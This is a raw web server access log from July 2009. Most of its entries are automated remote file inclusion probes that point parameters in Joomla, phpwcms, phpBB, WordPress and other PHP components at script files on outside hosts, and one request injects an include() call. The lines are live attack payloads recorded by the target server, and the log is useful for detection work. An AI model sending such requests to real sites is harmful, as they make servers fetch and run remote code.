211.230.156.161 - - [06/Jul/2009:04:57:28 -0400] "GET /logs/access_log.Q109060600%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:57:28 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:57:44 -0400] "GET /logs/access_log.Q109052100%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:58:38 -0400] "GET /logs/access_log.Q109052100%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:58:42 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:58:42 -0400] "GET /logs/access_log.Q109060800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:58:42 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:59:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.214.48.150 - - [06/Jul/2009:04:59:29 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:43 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:43 -0400] "GET /logs/access_log.Q109061700//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:43 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:59:45 -0400] "GET /logs//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:59:46 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:59:46 -0400] "GET //modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:46 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:46 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:46 -0400] "GET /logs/access_log.Q109061700//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:51 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:51 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:04:59:51 -0400] "GET /logs/access_log.Q109061700%20%20//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:09 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:09 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:09 -0400] "GET /logs/access_log.Q109061700//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:00:11 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:17 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:17 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:17 -0400] "GET /logs/access_log.Q109061700//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:00:26 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:46 -0400] "GET /logs/access_log.Q109061100//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:00:50 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:00:51 -0400] "GET /logs/access_log.Q109061100//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:00:59 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:01:19 -0400] "GET /logs//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:01:19 -0400] "GET //ashnews.php?pathtoashnews=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:01:40 -0400] "GET /logs/access_log.Q109061000%20%20//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:05:02:19 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:05:02:19 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:05:02:19 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:19 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:19 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:19 -0400] "GET /logs/access_log.Q109061700//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:24 -0400] "GET //includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:24 -0400] "GET /logs/access_log.Q109061700//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:24 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:02:30 -0400] "GET /logs/access_log.Q109060600/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:02:33 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:02:34 -0400] "GET /logs//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:02:36 -0400] "GET //modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:02:48 -0400] "GET /logs/access_log.Q109060600/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:05:02:48 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:02:48 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:02:51 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:55 -0400] "GET /logs/access_log.Q109061100//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.79.54.5 - - [06/Jul/2009:05:02:57 -0400] "GET /logs/access_log.Q109061100//includes/class_item.php?fileExtension=http://www.bangkoksexy.com//docs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:03:22 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:03:23 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:03:23 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:03:23 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:03:30 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:40 -0400] "GET /omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:40 -0400] "GET /logs/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:40 -0400] "GET /logs/access_log.Q109062000/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:42 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:42 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:42 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:43 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:43 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:43 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:47 -0400] "GET /logs/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:47 -0400] "GET /omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:03:47 -0400] "GET /logs/access_log.Q109062000/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:04:08 -0400] "GET /logs/access_log.Q109052400/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:04:08 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:04:09 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:04:18 -0400] "GET /logs/access_log.Q109052400/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:04:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [06/Jul/2009:05:04:32 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:05:02 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:05:54 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:05:54 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:05:54 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:05:57 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:05:57 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:05:57 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:06:08 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:06:08 -0400] "GET /logs/access_log.Q109051100%20%20//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:05:06:24 -0400] "GET /logs/access_log.Q109060600%20%20/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:06:27 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:06:45 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:05:06:59 -0400] "GET /images/items/6300320_thumb.jpg HTTP/1.1" 200 2843 "-" "Googlebot-Image/1.0"
72.30.65.36 - - [06/Jul/2009:05:07:10 -0400] "GET /logs/access_log.Q109070300 HTTP/1.0" 200 3011957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.78.62.84 - - [06/Jul/2009:05:07:55 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:07:55 -0400] "GET /errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:07:55 -0400] "GET /logs/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:13 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:15 -0400] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:15 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:20 -0400] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:21 -0400] "GET /logs/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:21 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:21 -0400] "GET /errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:26 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:27 -0400] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:27 -0400] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:29 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:05:08:29 -0400] "GET /logs/error_log.Q109050800%20%20/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:35 -0400] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:36 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:36 -0400] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:08:36 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:15 -0400] "GET /logs/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:16 -0400] "GET /errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:16 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:09:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [06/Jul/2009:05:09:27 -0400] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:27 -0400] "GET /logs/access_log.Q109061400/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:27 -0400] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:30 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:09:51 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:10:03 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:10:09 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:10:09 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:10:31 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:10:55 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:11:14 -0400] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
